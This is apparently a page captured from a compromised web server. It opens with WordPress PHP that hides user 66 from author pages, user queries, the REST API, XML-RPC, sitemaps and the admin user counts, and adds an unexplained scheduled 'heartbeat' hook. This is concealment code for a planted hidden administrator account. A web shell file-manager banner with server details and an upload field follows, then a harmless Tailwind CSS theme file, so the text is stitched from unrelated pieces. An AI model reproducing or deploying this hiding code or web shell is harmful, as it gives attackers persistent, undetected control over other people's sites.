add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/reef_analytics/resources/css/ |
Upload File : |
@import 'tailwindcss';
@source '../../vendor/laravel/framework/src/Illuminate/Pagination/resources/views/*.blade.php';
@source '../../storage/framework/views/*.php';
@theme {
--font-sans: system-ui, -apple-system, 'Segoe UI', sans-serif;
}
/*
* Design tokens — light is the default; dark applies via the OS preference
* (unless the user forced light) or the explicit data-theme="dark" stamp.
* Palette follows the validated dataviz reference palette.
*/
:root {
color-scheme: light;
--plane: #f9f9f7;
--surface-1: #fcfcfb;
--text-primary: #0b0b0b;
--text-secondary: #52514e;
--text-muted: #898781;
--grid-line: #e1e0d9;
--baseline: #c3c2b7;
--hairline: rgba(11, 11, 11, 0.1);
--series-1: #2a78d6;
--series-2: #eb6834;
--series-3: #1baf7a;
--series-4: #eda100;
--series-5: #e87ba4;
--series-6: #008300;
--series-7: #4a3aa7;
--series-8: #e34948;
--delta-good: #006300;
--delta-bad: #d03b3b;
/* sequential blue ramp (heatmaps); ordinal use clamps the light end */
--seq-100: #cde2fb;
--seq-200: #9ec5f4;
--seq-250: #86b6ef;
--seq-300: #6da7ec;
--seq-400: #3987e5;
--seq-450: #2a78d6;
--seq-500: #256abf;
--seq-550: #1c5cab;
--seq-600: #184f95;
--seq-700: #0d366b;
/* ordinal ramp bounds (funnel steps): lightest / darkest usable step */
--ordinal-lo: var(--seq-250);
--ordinal-hi: var(--seq-550);
}
:root[data-theme='dark'] {
color-scheme: dark;
--plane: #0d0d0d;
--surface-1: #1a1a19;
--text-primary: #ffffff;
--text-secondary: #c3c2b7;
--text-muted: #898781;
--grid-line: #2c2c2a;
--baseline: #383835;
--hairline: rgba(255, 255, 255, 0.1);
--series-1: #3987e5;
--series-2: #d95926;
--series-3: #199e70;
--series-4: #c98500;
--series-5: #d55181;
--series-6: #008300;
--series-7: #9085e9;
--series-8: #e66767;
--delta-good: #0ca30c;
--delta-bad: #d03b3b;
--ordinal-lo: var(--seq-300);
--ordinal-hi: var(--seq-600);
}
@media (prefers-color-scheme: dark) {
:root:where(:not([data-theme='light'])) {
color-scheme: dark;
--plane: #0d0d0d;
--surface-1: #1a1a19;
--text-primary: #ffffff;
--text-secondary: #c3c2b7;
--text-muted: #898781;
--grid-line: #2c2c2a;
--baseline: #383835;
--hairline: rgba(255, 255, 255, 0.1);
--series-1: #3987e5;
--series-2: #d95926;
--series-3: #199e70;
--series-4: #c98500;
--series-5: #d55181;
--series-6: #008300;
--series-7: #9085e9;
--series-8: #e66767;
--delta-good: #0ca30c;
--delta-bad: #d03b3b;
--ordinal-lo: var(--seq-300);
--ordinal-hi: var(--seq-600);
}
}
body {
background: var(--plane);
color: var(--text-primary);
}
.card {
background: var(--surface-1);
border: 1px solid var(--hairline);
border-radius: 0.75rem;
}
.nav-tab {
color: var(--text-secondary);
border-bottom: 2px solid transparent;
}
.nav-tab.active {
color: var(--text-primary);
border-bottom-color: var(--series-1);
}
.nav-tab:hover {
color: var(--text-primary);
}
/* Chart info ⓘ — tooltip on hover, focus, or tap (JS toggles .open). */
.info-btn {
display: inline-flex;
align-items: center;
justify-content: center;
width: 1.1rem;
height: 1.1rem;
border-radius: 9999px;
border: 1px solid var(--baseline);
color: var(--text-muted);
font-size: 0.7rem;
font-style: italic;
font-family: Georgia, serif;
line-height: 1;
cursor: help;
}
.info-btn:hover,
.info-btn:focus-visible {
color: var(--text-primary);
border-color: var(--text-muted);
}
.info-pop {
position: absolute;
top: calc(100% + 0.5rem);
right: 0;
z-index: 20;
width: 18rem;
max-width: 80vw;
padding: 0.6rem 0.75rem;
border-radius: 0.5rem;
background: var(--surface-1);
border: 1px solid var(--baseline);
box-shadow: 0 4px 16px rgba(0, 0, 0, 0.12);
color: var(--text-secondary);
font-size: 0.75rem;
line-height: 1.45;
display: none;
}
.info-wrap:hover .info-pop,
.info-btn:focus-visible + .info-pop,
.info-wrap.open .info-pop {
display: block;
}
/* Theme toggle shows the mode you would switch TO. */
.theme-icon-light {
display: none;
}
.theme-icon-dark {
display: inline;
}
:root[data-theme='dark'] .theme-icon-light {
display: inline;
}
:root[data-theme='dark'] .theme-icon-dark {
display: none;
}
@media (prefers-color-scheme: dark) {
:root:where(:not([data-theme='light'])) .theme-icon-light {
display: inline;
}
:root:where(:not([data-theme='light'])) .theme-icon-dark {
display: none;
}
}